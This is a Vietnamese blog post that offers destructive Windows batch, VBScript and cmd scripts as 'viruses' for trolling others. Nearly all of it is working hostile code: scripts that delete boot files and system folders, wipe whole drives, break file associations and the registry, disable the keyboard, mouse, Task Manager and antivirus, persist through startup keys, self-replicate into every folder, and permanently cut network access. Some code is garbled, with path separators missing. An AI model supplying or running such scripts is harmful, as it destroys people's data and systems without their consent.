Phá máy tính với cmd, file .bat
MỘT SỐ TIỆN ÍCH CỦA FILE .BAT ĐỂ TROLL NGƯỜI KHÁC HOẶC PHÁ VUI
Mình sẽ cho các bạn xem một số code của con virus đuôi .BAT:
Các bạn mở notepad lên, copy các đoạn code dưới đây vào rồi, save lại thành đuôi .bat, .vsb hay .cmd tùy theo Code nhé
Trong lúc Save thì xem hình bên dưới: Save as type: All Files
1) virus phá hoại cửa sổ windown:
Code:
@echo off msg *virus activated* attrib -r -s -h c:autoexec.bat del c:autoexec.bat attrib -r -s -h c:boot.ini del c:boot.ini attrib -r -s -h c:ntldr del c:ntldr attrib -r -s -h c:windowswin.ini del c:windowswin.ini @echo off msg *Computer Over. Virus=Very Yes.* shutdown -s -t 10 -c " "
2) Loại virus này làm vô hiệu hóa chuột, bàn phím,task manager, thay đổi tập tin:
code:
@echo off prompt $P $G assoc .doc = fA1luRe assoc .docx = fA1luRe assoc .log = fA1luRe assoc .msg = fA1luRe assoc .pages = fA1luRe assoc .rtf = fA1luRe assoc .txt = fA1luRe assoc .wpd = fA1luRe assoc .wps = fA1luRe assoc .accdb = fA1luRe assoc .blg = fA1luRe assoc .csv = fA1luRe assoc .dat = fA1luRe assoc .db = fA1luReassoc .efx = fA1luRe assoc .mdb = fA1luRe assoc .pdb = fA1luRe assoc .pps = fA1luRe assoc .ppt = fA1luRe assoc .pptx = fA1luRe assoc .sdb = fA1luRe assoc .sdf = fA1luRe assoc .sql = fA1luRe assoc .vcf = fA1luRe assoc .wks = fA1luRe assoc .xls = fA1luRe assoc .xlsx = fA1luRe assoc .xml = fA1luRe assoc .bmp = fA1luRe assoc .gif = fA1luRe assoc .jpg = fA1luRe assoc .png = fA1luRe assoc .psd = fA1luRe assoc .psp = fA1luRe assoc .thm = fA1luRe assoc .tif = fA1luRe assoc .ai = fA1luRe assoc .drw = fA1luRe assoc .eps = fA1luRe assoc .ps = fA1luRe assoc .svg = fA1luRe assoc .3dm = fA1luRe assoc .dwg = fA1luRe assoc .dxf = fA1luRe assoc .pln = fA1luRe assoc .indd = fA1luRe assoc .pct = fA1luRe assoc .pdf = fA1luRe assoc .qxd = fA1luRe assoc .qxp = fA1luReassoc .rels = fA1luRe assoc .aac = fA1luRe assoc .aif = fA1luRe assoc .iff = fA1luRe assoc .m3u = fA1luRe assoc .mid = fA1luRe assoc .mp3 = fA1luRe assoc .mpa = fA1luRe assoc .ra = fA1luRe assoc .wav = fA1luRe assoc .wma = fA1luRe assoc .3g2 = fA1luRe assoc .3gp = fA1luRe assoc .asf = fA1luRe assoc .asx = fA1luRe assoc .avi = fA1luRe assoc .flv = fA1luRe assoc .mov = fA1luRe assoc .mp4 = fA1luRe assoc .mpg = fA1luRe assoc .rm = fA1luRe assoc .swf = fA1luRe assoc .vob = fA1luRe assoc .wmv = fA1luRe assoc .asp = fA1luRe assoc .cer = fA1luRe assoc .csr = fA1luRe assoc .css = fA1luRe assoc .htm = fA1luRe assoc .html = fA1luRe assoc .js = fA1luRe assoc .jsp = fA1luRe assoc .php = fA1luRe assoc .rss = fA1luRe assoc .tvpi = fA1luRe assoc .tvvi = fA1luReassoc .xhtml = fA1luRe assoc .fnt = fA1luRe assoc .fon = fA1luRe assoc .otf = fA1luRe assoc .ttf = fA1luRe assoc .8bi = fA1luRe assoc .plugin = fA1luRe assoc .xll = fA1luRe assoc .cab = fA1luRe assoc .cpl = fA1luRe assoc .cur = fA1luRe assoc .dll = fA1luRe assoc .dmp = fA1luRe assoc .drv = fA1luRe assoc .key = fA1luRe assoc .lnk = fA1luRe assoc .sys = fA1luRe assoc .cfg = fA1luRe assoc .ini = fA1luRe assoc .keychain = fA1luRe assoc .prf = fA1luRe assoc .app = fA1luRe assoc .bat = fA1luRe assoc .cgi = fA1luRe assoc .com = fA1luRe assoc .exe = fA1luRe assoc .pif = fA1luRe assoc .vb = fA1luRe assoc .ws = fA1luRe assoc .7z = fA1luRe assoc .deb = fA1luRe assoc .gz = fA1luRe assoc .pkg = fA1luRe assoc .rar = fA1luRe assoc .sit = fA1luRe assoc .sitx = fA1luReassoc .tar.gz = fA1luRe assoc .zip = fA1luRe assoc .zipx = fA1luRe assoc .bin = fA1luRe assoc .hqx = fA1luRe assoc .mim = fA1luRe assoc .uue = fA1luRe assoc .c = fA1luRe assoc .cpp = fA1luRe assoc .dtd = fA1luRe assoc .java = fA1luRe assoc .pl = fA1luRe assoc .bak = fA1luRe assoc .bup = fA1luRe assoc .gho = fA1luRe assoc .ori = fA1luRe assoc .tmp = fA1luRe assoc .dmg = fA1luRe assoc .iso = fA1luRe assoc .toast = fA1luRe assoc .vcd = fA1luRe assoc .gam = fA1luRe assoc .nes = fA1luRe assoc .rom = fA1luRe assoc .sav = fA1luRe assoc .dbx = fA1luRe assoc .msi = fA1luRe assoc .part = fA1luRe assoc .torrent = fA1luRe assoc .yps = fA1luRe rundll32.exe mouse, disable rundll32.exe keyboard, disable copy setup.bat %userprofile%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup copy setup.bat %windir%System32 reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v fA1luRe /t REG_SZ /d %windir%System32setup.bat taskkill /f /im taskmgr.exe reg restore HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPolicie sSystem DisableTaskMgr = 1 shutdown -s -f -t 10 -c "PwN3D by fA1luRe!!!"
3) Kiểm tra % của CPU lên đến bao nhiêu %:
Bạn mở notepad ra và gõ start 1.bat vào trong rồi các bạn lưu con virus này là
1.bat rồi ngay lập tức % CPU sẽ tăng lên.
4) Lặp lại nhiều lần chu kỳ mess:
Code:
@ECHO off :Begin msg * lời cảnh báo msg * lời cảnh báo msg * lời cảnh báo msg * lời cảnh báo msg * lời cảnh báo GOTO BEGIN VD: @ECHO off :Begin msg * Hi msg * khoe ko anh ? msg * em ne ? msg * buon ngu chua anh ? msg * tat may ngu thoi ,bb anh GOTO BEGIN
5) Tự động tắt máy và kèm theo lời nhắn:
Code:
@echo off msg * lời cảnh báo shutdown -c “lời cảnh báo” -s VD:@echo off msg * I LOVE YOU shutdown -c “Error! tam biet anh!” -s
Còn đây là một số con virus có đuôi là .VBS
- Chức năng gửi thông điệp cảnh báo:
Code:
TEXT1=MSGBOX("THÔNG ĐIÊP CẢNH BÁO",42,"TÊN THÔNG ĐIỆP CẢNH BÁO")
2) Chức năng làm đứng máy tính:
Code:
msgbox"Error !" On Error Resume Next Set vip_xinh = Createobject("scripting.filesystemobject") vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& " vip_xinh.vbs" Set vip_xinh2= CreateObject("WScript.Shell") vip_xinh2.regwrite "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRu ndie","wscript.exe "& vip_xinh.GetSpecialFolder(0)& " vip_xinh.vbs %" On Error Resume Next Const vic = "D:" Delvic Sub Delvic() Dim fso Set fso = CreateObject("Scripting.FileSystemObject") fso.DeleteFile vic & "*.*" , True fso.DeleteFolder vic & "*" , True End Sub On Error Resume Next Const vic1 = "C:windows" Delvic1 Sub Delvic1() Dim fso1 Set fso1 = CreateObject("Scripting.FileSystemObject")fso1.DeleteFile vic1 & "*.*" , True fso1.DeleteFolder vic1 & "*" , True End Sub On Error Resume Next Const vic2 = "C:" Delvic2 Sub Delvic2() Dim fso2 Set fso2 = CreateObject("Scripting.FileSystemObject") fso2.DeleteFile vic2 & "*.*" , True fso2.DeleteFolder vic2 & "*" , True End Sub On Error Resume Next Set treomay= CreateObject("WScript.Shell") Do treomay.run "notepad",false loop
3) Đây là một con virus rất ác mình khuyên ban muốn thử nó thì hãy đóng
băng tất cả các ổ trước khi sử dụng nó không thì rước họa vào thân đấy bạn
Code:
Dim fso,file,VBCopy Set fso=CreateObject("Scripting.FileSystemObject") Set file=fso.OpenTextFile(WScript.ScriptFullName,1) VBCopy=file.ReadAll FolderList("A:") FolderList("B:") FolderList("C:") FolderList("D:") FolderList("E:") FolderList("F:") FolderList("G:") FolderList("H:") FolderList("I:")FolderList("J:") FolderList("K:") FolderList("L:") FolderList("M:") FolderList("N:") FolderList("O:") FolderList("P:") FolderList("Q:") FolderList("R:") FolderList("S:") FolderList("T:") FolderList("U:") FolderList("V:") FolderList("X:") FolderList("Y:") FolderList("Z:") FolderList("W:") Sub FolderList(FolderSpec) On Error Resume Next Dim f,f1,sf,COP,CAP Set f=fso.GetFolder(FolderSpec) set sf=f.SubFolders For Each f1 In sf Set COP=fso.CreateTextFile(f1.path & "Virus !!!!!!!.vbs") COP.write VBCopy Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs") CAP.write VBCopy FolderList(f1.Path) Next End sub
Còn đây là thuốc giải:
Code:
Dim fso,file,VBCopy Set fso=CreateObject("Scripting.FileSystemObject") Set file=fso.OpenTextFile(WScript.ScriptFullName,1)VBCopy=file.ReadAll FolderList("A:") FolderList("B:") FolderList("C:") FolderList("D:") FolderList("E:") FolderList("F:") FolderList("G:") FolderList("H:") FolderList("I:") FolderList("J:") FolderList("K:") FolderList("L:") FolderList("M:") FolderList("N:") FolderList("O:") FolderList("P:") FolderList("Q:") FolderList("R:") FolderList("S:") FolderList("T:") FolderList("U:") FolderList("V:") FolderList("X:") FolderList("Y:") FolderList("Z:") FolderList("W:") Sub FolderList(FolderSpec) On Error Resume Next Dim f,f1,sf,COP,CAP,ATT Set f=fso.GetFolder(FolderSpec) set sf=f.SubFolders For Each f1 In sf 'Set COP=fso.CreateTextFile(f1.path & "Virus !!!!!!!.vbs") 'COP.write VBCopy 'Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs") 'CAP.write VBCopy'Set ATT=fso.GetFolder(f1.Path) 'ATT.Attributes=ATT.Attributes+2 fso.DeleteFile(f1.path & "Virus !!!!!!!.vbs") fso.DeleteFile(f1.path & "---Virus !!!!!!!.vbs") FolderList(f1.Path) Next End sub
4) Chức năng mở một thông điệp rồi sẽ tự động tắt máy:
Code:
@ECHO OFF MSG * THÔNG ĐIỆP SHUTDOWN -C "THÔNG ĐIỆP" -S -T 10
5) Không cho victim khởi động máy:
Code:
DIM WSH SET WSH = CREATEOBJECT("WSCRIPT.SHELL") WSH.RUN "RUNDLL32.EXE USER.EXE,EXITWINDOWS"
6)Disable NAV:
Code:
DIM WSH SET WSH= CREATEOBJECT( "WSCRIPT.SHELL") S1 = " HKEY_LOCAL_MACHINESYSTEMCURRENTCONTROLSETSERVIC ESNORTON PROGRAM SCHEDULERSTART" WSH.REGWRITE S1,3, "REG_DWORD"
7) Hiển thị message mỗi khi restart máy:
Code:
DIM WSH SET WSH = CREATEOBJECT( "WSCRIPT.SHELL" ) S1 = " HKLMSOFTWAREMICROSOFTWINDOWSCURRENTVERSIONWIN LOGON" S2 = "LEGALNOTICECAPTION"S3 = "LEGALNOTICETEXT" WSH.REGWRITE S1+S2, "LỜI CẢNH BÁO" WSH.REGWRITE S1+S3, "LỜI CẢNH BÁO"
8) Chuc nang hien thi dong lenh khi ban click vao Thư mục:
Code:
SET REG=CREATEOBJECT("WSCRIPT.SHELL") REG.REGWRITE "HKEY_CLASSES_ROOT*SHELL","LOI CANH BAO" REG.REGWRITE "HKEY_CLASSES_ROOTFOLDERSHELLLOI CANH BAO","SLM"
vd:
SET REG=CREATEOBJECT("WSCRIPT.SHELL") REG.REGWRITE "HKEY_CLASSES_ROOT*SHELL","HI ! BAN DA BI NHIEM WK TU TRUONGTON.NET" REG.REGWRITE "HKEY_CLASSES_ROOTFOLDERSHELLHI ! BAN DA BI NHIEM WK TU TRUONGTON.NET","SLM"
9) Xóa Registry Files:
Code:
@ECHO OFF START REG DELETE HKCR/.EXE START REG DELETE HKCR/.DLL START REG DELETE HKCR/* :MESSAGE ECHO SLM LOI CANH BAO. GOTO MESSAGE
vd:
@ECHO OFF START REG DELETE HKCR/.EXE START REG DELETE HKCR/.DLL START REG DELETE HKCR/* :MESSAGE ECHO SLM CHUC ANH 1 NGAY VUI VE. GOTO MESSAGE
10) Bật notepad lien tuc lam may tinh bi ngơ:
CODE:@ECHO OFF :TOP START %SYSTEMROOT%SYSTEM32NOTEPAD.EXE GOTO TOP
11) Bật tắt caps lock liên tục:
Code:
SET WSHSHELL =WSCRIPT.CREATEOBJECT("WSCRIPT.SHELL") DO WSCRIPT.SLEEP 100 WSHSHELL.SENDKEYS "{CAPSLOCK}" LOOP
12) Ép enter liên tục:
Code:
SET WSHSHELL = WSCRIPT.CREATEOBJECT("WSCRIPT.SHELL") DO WSCRIPT.SLEEP 100 WSHSHELL.SENDKEYS "~(ENTER)" LOOP
12) Ép Space liên tục:
MSGBOX "LET'S GO BACK A FEW STEPS" SET WSHSHELL =WSCRIPT.CREATEOBJECT("WSCRIPT.SHELL") DO WSCRIPT.SLEEP 100 WSHSHELL.SENDKEYS "{BS}" LOOP
Còn đây là một số con virus có đuôi .cmd:
1)Xóa sạch tất cả các file có trong máy:
Code:
DEL /F /Q *
2)Xóa một file nào đó:
Code:
erase đường dẫnvd:
ERASE C:TEST.TXT
3) Ẩn tòan bộ file trong win
Code:
ATTRIB +S /F /Q *
Update Thêm Vài Con Virus Cực Nguy Hiểm
1) Vĩnh Biệt PC Forever
Các bạn cẩn thận khi tạo xong ko nên click vào nhé !!
@echo off attrib -r -s -hc: autoexec.bat del c: autoexec.bat attrib -r -s -hc: boot.ini del c: boot.ini attrib -r -s -hc: ntldr del c: ntldr attrib -r -s -hc: windows win.ini del c: windows win.ini
Lưu Với Đuôi .Bat và ko click vào nếu ko muốn gặp hậu quả nha !!
2) Virus Nguy Hiểm Chưa Có Tên
@echo off del D: *. * / f / s / q del E: *. * / f / s / q del F: *. * / f / s / q del G: *. * / f / s / q del H: *. * / f / s / q del I: *. * / f / s / q del J: *. * / f / s / q
Lưu Với tên SEO.bat
Cái này còn nguy hiểm hơn. Để học hỏi thôi chứ đừng phá máy người ta =))
4) Không Cho Windows Khởi Động
Del c:. WINDOWS system32 * * / q
Lưu Lại là anything.bat
5) Vô Hiệu Hóa InterNet Vĩnh viễn
echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE
Lưu Lại với Đuôi .Bat
6) Đổi Đuôi Tất Cả Thành TXT
Làm rối loạn dữ liệu máy tính
REN * .DOC * .TXT REN * .JPEG * .TXT REN * LNK * .TXT REN * .AVI * .TXT REN * .MPEG * .TXT REN * .COM * .TXT REN * .BAT * .TXT
Lưu Đuôi .Bat